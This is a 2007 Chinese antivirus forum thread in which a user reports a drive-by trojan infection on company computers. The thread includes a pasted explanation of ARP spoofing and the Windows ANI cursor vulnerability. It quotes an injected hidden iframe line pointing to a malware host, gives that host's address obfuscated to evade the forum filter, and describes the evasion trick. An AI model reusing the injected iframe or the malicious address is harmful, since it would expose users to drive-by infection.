afeng8848
新手上路
积分 35
发帖 35
注册 2007-6-10
|
#1 一个带木马的网页,希望微点研究一下
[url]hXXp://1234.111.cn/111.htm[/url]
前天公司很多电脑上了公司内部网页后都中招了,会连到这个网站,微点提示发现未知木马,处理失败,但开起来还是挡住了,别的装瑞星的机子都挂了。
希望微点研究一下。
[ Last edited by Legend on 2007-6-11 at 11:47 ]
| |
※ ※ ※ 本文纯属【afeng8848】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
 |
|
2007-6-10 19:08 |
|
Legend
超级版主
超级版主
积分 77171
发帖 70170
注册 2005-10-29
|
|
|
2007-6-10 19:13 |
|
linovo
中级用户
积分 346
发帖 334
注册 2006-12-9
|
#3
奇怪了,版主居然不屏蔽楼主提供的网址。不过我测试那个网址,网页无法打开。
| |
※ ※ ※ 本文纯属【linovo】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-6-10 20:58 |
|
norman6810
版主
积分 3351
发帖 3303
注册 2007-4-4
|
|
|
2007-6-10 21:05 |
|
afeng8848
新手上路
积分 35
发帖 35
注册 2007-6-10
|
#5
刚发现,原来被屏蔽了,都被替换成"111"了.
| |
※ ※ ※ 本文纯属【afeng8848】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-6-11 11:38 |
|
afeng8848
新手上路
积分 35
发帖 35
注册 2007-6-10
|
#6
重试一下,用逗号替换下点,看会不会被屏蔽.
http://1234,89111,cn/
[ Last edited by Legend on 2007-6-11 at 11:48 ]
| |
※ ※ ※ 本文纯属【afeng8848】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-6-11 11:41 |
|
afeng8848
新手上路
积分 35
发帖 35
注册 2007-6-10
|
#7
ok,大家把逗号换成点应该就可以了.
| |
※ ※ ※ 本文纯属【afeng8848】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-6-11 11:41 |
|
afeng8848
新手上路
积分 35
发帖 35
注册 2007-6-10
|
#8 附上一篇网上同样中招的帖子
一·事件分析
今天上午突然发现访问大部分网站时,杀毒软件报警,找到 Trojan.Anicmoo 病毒,这时候我恰巧在浏览QQwish,误以为是服务器提供商的问题,因为我的网页代码没有任何问题,但是传到服务器上后访问得到的代码,头部都会被添加以下片段:<iframe src=http://1234,89111,cn/woyao,htm width=0 height=0></iframe>
于是在线咨询了时代互联的技术,好不容易才得到答复,结果发现和我的空间同服务器的网站都不存在这个问题。这太奇怪了,代码没有问题,访问却出了问题,而服务器一切正常,问题到底出在哪里呢。
我开始怀疑学校网络出现了故障,只有学校的代理服务器有权力修改客户端请求的页面,也许就是学校的服务器篡改了网页内容,我试着点开其他的网站,结果发现连百度,google这样的大站也有毒,这绝对不可能,这更加支持了学校网络出现了问题的假设。原来这属于 Arp欺骗,病毒先欺骗被感染主机释放虚假的arp响应信息,以此篡改客户端的arp缓存,在受感染的机器上应该存有篡改网页的程序,然后引导客户端去取得远程的病毒文件。
这个远程病毒文件利用微软年初刚刚公布的ANI漏洞使得任意代码均可执行。
二·ARP的信息:
ARP(Address Resolution Protocol)是地址解析协议,是一种将IP地址转化成物理地址的协议。从IP地址到物理地址的映射有两种方式:表格方式和非表格方式。ARP具体说来就是将网络层(IP层,也就是相当于OSI的第三层)地址解析为数据连接层(MAC层,也就是相当于OSI的第二层)的MAC地址。
ARP原理:某机器A要向主机B发送报文,会查询本地的ARP缓存表,找到B的IP地址对应的MAC地址后,就会进行数据传输。如果未找到,则广播A一个ARP请求报文(携带主机A的IP地址Ia——物理地址Pa),请求IP地址为Ib的主机B回答物理地址Pb。网上所有主机包括B都收到ARP请求,但只有主机B识别自己的IP地址,于是向A主机发回一个ARP响应报文。其中就包含有B的MAC地址,A接收到B的应答后,就会更新本地的ARP缓存。接着使用这个MAC地址发送数据(由网卡附加MAC地址)。因此,本地高速缓存的这个ARP表是本地网络流通的基础,而且这个缓存是动态的。
ARP协议并不只在发送了ARP请求才接收ARP应答。当计算机接收到ARP应答数据包的时候,就会对本地的ARP缓存进行更新,将应答中的IP和MAC地址存储在ARP缓存中。因此,当局域网中的某台机器B向A发送一个自己伪造的ARP应答,而如果这个应答是B冒充C伪造来的,即IP地址为C的IP,而MAC地址是伪造的,则当A接收到B伪造的ARP应答后,就会更新本地的ARP缓存,这样在A看来C的IP地址没有变,而它的MAC地址已经不是原来那个了。由于局域网的网络流通不是根据IP地址进行,而是按照MAC地址进行传输。所以,那个伪造出来的MAC地址在A上被改变成一个不存在的MAC地址,这样就会造成网络不通,导致A不能Ping通C!这就是一个简单的ARP欺骗
三·ANI漏洞信息:
近日,DSW Lab Avert小组监测到一个高度危险的微软漏洞被地下公布,该漏洞出现在光标格式文件(.ANI)。恶意攻击者可以构造特殊格式的光标文件,并在网页中嵌入相关脚本,在用户浏览网页时触发该漏洞,漏洞被激活后可以执行任意代码,恶意攻击者可以在后台悄悄下载木马安装在受害用户系统中。
超级巡警团队目前已经截获几起利用该漏洞挂马的事件。
该漏洞影响Windows 2000 /Windows XP /Windows 2003 所有版本,微软最新系统Vista也受该漏洞影响。
目前微软官方尚无对该漏洞作出反映。
| |
※ ※ ※ 本文纯属【afeng8848】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-6-11 11:49 |
|
Legend
超级版主
超级版主
积分 77171
发帖 70170
注册 2005-10-29
|
|
|
2007-6-11 11:51 |
|
afeng8848
新手上路
积分 35
发帖 35
注册 2007-6-10
|
#10
我们的系统没打补丁,打了补丁的访问这个网占不会提示有木马的,系统漏洞问题.
| |
※ ※ ※ 本文纯属【afeng8848】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-6-11 11:54 |
|
